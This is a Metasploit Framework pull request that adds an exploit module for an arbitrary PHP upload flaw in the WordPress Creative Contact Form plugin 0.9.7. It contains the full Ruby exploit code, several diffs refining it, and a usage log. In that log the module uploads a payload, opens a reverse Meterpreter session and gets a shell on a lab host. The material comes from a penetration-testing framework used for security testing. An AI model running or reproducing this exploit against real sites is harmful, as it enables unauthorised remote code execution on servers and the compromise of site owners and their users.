### PR TITLE
Add Module WordPress Creative Contact Form upload

### DIFF
--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -57,11 +57,15 @@ class Metasploit3 < Msf::Exploit::Remote
       'data'      => post_data
     })
 
-    if res && res.code == 200 && res.body =~ /files|#{php_pagename}/
-      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
-      register_files_for_cleanup(php_pagename)
+    if res
+      if res.code == 200 && res.body =~ /files|#{php_pagename}/
+        print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+        register_files_for_cleanup(php_pagename)
+      else
+        fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
     else
-      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+      fail_with('ERROR')
     end
 
     print_status("#{peer} - Calling payload...")

--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -40,15 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi(
-      'uri'    => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php')
-    )
-
-    if res && res.code == 200 && res.body =~ /files/
-      return Exploit::CheckCode::Detected
-    end
-
-    Exploit::CheckCode::Safe
+    check_plugin_version_from_readme('sexy-contact-form', '0.9.7')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -20,13 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'TO DO', # Vulnerability discovery
+          'Gianni Angelozzi', # Vulnerability discovery
           'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['URL', 'http://domain.com']
+          ['EDB', '35057'],
+          ['OSVDB', '113669']
         ],
       'Privileged'     => false,
       'Platform'       => 'php',

--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -69,8 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("#{peer} - Calling payload...")
-    send_request_cgi({
+    send_request_cgi(
       'uri'       => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
-    }, 2)
+    )
   end
 end

--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
       'Targets'        => [['Creative Contact Form 0.9.7', {}]],
-      'DisclosureDate' => 'Sep 22 2014',
+      'DisclosureDate' => 'Oct 22 2014',
       'DefaultTarget'  => 0)
     )
   end

--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -54,7 +54,6 @@ class Metasploit3 < Msf::Exploit::Remote
     php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
 
     data = Rex::MIME::Message.new
-    #data.add_part('files[]', nil, nil, 'form-data; name="action"')
     data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
     post_data = data.to_s
 

--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    check_plugin_version_from_readme('sexy-contact-form', '0.9.7')
+    check_plugin_version_from_readme('sexy-contact-form', '1.0.0')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           ['EDB', '35057'],
-          ['OSVDB', '113669']
+          ['OSVDB', '113669'],
+          ['WPVDB', '7652']
         ],
       'Privileged'     => false,
       'Platform'       => 'php',

--- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb
@@ -1,0 +1,79 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress Creative Contact Form Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress Creative Contact
+        Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'TO DO', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://domain.com']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Creative Contact Form 0.9.7', {}]],
+      'DisclosureDate' => 'Sep 22 2014',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php')
+    )
+
+    if res && res.code == 200 && res.body =~ /files/
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+
+    data = Rex::MIME::Message.new
+    #data.add_part('files[]', nil, nil, 'form-data; name="action"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
+    post_data = data.to_s
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'index.php'),
+      'method'    => 'POST',
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data
+    })
+
+    if res && res.code == 200 && res.body =~ /files|#{php_pagename}/
+      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+      register_files_for_cleanup(php_pagename)
+    else
+      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+    end
+
+    print_status("#{peer} - Calling payload...")
+    send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
+    }, 2)
+  end
+end


### PR DESCRIPTION
#### Add WordPress Creative Contact Form 0.9.7 Shell Upload.

  Application: WordPress Creative Contact Form
  Homepage: https://wordpress.org/plugins/sexy-contact-form
  Source Code: https://downloads.wordpress.org/plugin/sexy-contact-form.0.9.7.zip
  Active Installs (wordpress.org): 5,000+
#### Vulnerable packages*

  0.9.7
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_creativecontactform_file_upload 
msf exploit(wp_creativecontactform_file_upload) > show options 

Module options (exploit/unix/webapp/wp_creativecontactform_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Creative Contact Form 0.9.7


msf exploit(wp_creativecontactform_file_upload) > info

       Name: Wordpress Creative Contact Form Upload Vulnerability
     Module: exploit/unix/webapp/wp_creativecontactform_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-10-22

Provided by:
  Gianni Angelozzi
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   Creative Contact Form 0.9.7

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress 
  Creative Contact Form version 0.9.7. The vulnerability allows for 
  arbitrary file upload and remote code execution.

References:
  http://www.exploit-db.com/exploits/35057
  http://www.osvdb.org/113669

msf exploit(wp_creativecontactform_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_creativecontactform_file_upload) > run

[*] Started reverse handler on 192.168.1.46:4444 
[+] 192.168.1.31:80 - Our payload is at: kyfbCzwa.php. Calling payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40393) at 2015-04-13 18:44:47 -0300
[+] Deleted kyfbCzwa.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 23370 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
